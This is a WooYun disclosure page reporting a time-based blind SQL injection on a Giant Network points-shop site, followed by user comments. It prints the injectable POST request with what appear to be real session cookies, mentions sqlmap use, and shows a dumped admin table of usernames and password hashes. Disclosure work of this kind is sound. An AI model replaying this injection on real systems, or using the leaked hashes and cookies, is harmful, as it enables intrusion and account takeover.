当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137016

漏洞标题:巨人网络某站SQL注入一枚(基于时间盲注,涉及2393个表)

相关厂商:巨人网络

漏洞作者: Xmyth_夏洛克

提交时间:2015-08-26 12:03

修复时间:2015-08-31 12:04

公开时间:2015-08-31 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-26: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

23333

详细说明:

存在注入URL:
http://jf.ztgame.com/detail.php?id=1114

存在注入页面.png


存在注入页面2.png


抓到post包

POST /do_buy.php HTTP/1.1
Host: jf.ztgame.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://jf.ztgame.com/detail.php?id=1114
Content-Length: 40
Cookie: lzstat_uv=20369013642270749850|763557; lzstat_ss=1619577078_0_1439828628_763557; _jslog_logininfo_yzd=eyIzMzE5MjE1ODMiOlsiMzMxOTIxNTgzIiwiMjAxNS0wOC0yNiAwOToxNzo0NSIsMiwiTlVMTCIsIk5VTEwiXX0%3D; jifen_uid=331921583; jifen_account=jsj730sos; jifen_hash=cece7ede9744b5a18b89a1e8b36f4437; jiathis_rdc=%7B%22http%3A//jf.ztgame.com/share.php%3Fuid%3D331921583%26url%3Dhttp%253A%252F%252Fjf.ztgame.com%22%3A%220%7C1440551921293%22%7D
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
product_id=1114&product_num=2&act=do_buy


其中product_id,product_num均存在注入
放入sqlmap跑,跑出7个数据库

7个数据库.png

漏洞证明:

dba权限

dba.png


vip库中存在2000余个表

2393个表.png


时间关系就不跑完了
里面有玩家的用户名密码,电话等等敏感信息
Database: vip
Table: admin_user
[7 entries]
+------------+----------------------------------+
| user_name | passwd |
+------------+----------------------------------+
| dddd | <blank> |
| ddd | <blank> |
| yewenqi | 03fcbf8036254469c07c0dc5766254ee |
| qiuhonghua | 19627if1bae7304965824:8d7cbdca7a |
| xinjian | 19d6ddfa544f43c94d830e6e1a044aad |
| mali1 | 1cb80e0e86ee786aba88a2e3bd226e35 |
| guokeqing | 229d246593fc8712c0811469a78bc189 |
+------------+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-31 12:04

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-31 20:11 | 西西 ( 路人 | Rank:14 漏洞数:7 | 走过路过不会错过!)

    居然忽略了。

  2. 2015-08-31 20:20 | Xmyth_夏洛克 ( 普通白帽子 | Rank:477 漏洞数:62 | 啥都不会)

    @西西 我也不懂。。。

  3. 2015-08-31 22:24 | 大师兄 ( 路人 | Rank:6 漏洞数:3 | 每日必关注乌云)

    @Xmyth_夏洛克 忽略了?什么情况?偷偷修补?做测试的服务器?蜜罐?抑或...

  4. 2015-09-01 08:17 | Xmyth_夏洛克 ( 普通白帽子 | Rank:477 漏洞数:62 | 啥都不会)

    @大师兄 不清楚。。。巨人有时候忽略有时候确认。。。

  5. 2015-09-01 21:31 | 八云紫 ( 实习白帽子 | Rank:64 漏洞数:11 | 普建出长门,大建出大和)

    其实大部分都是日志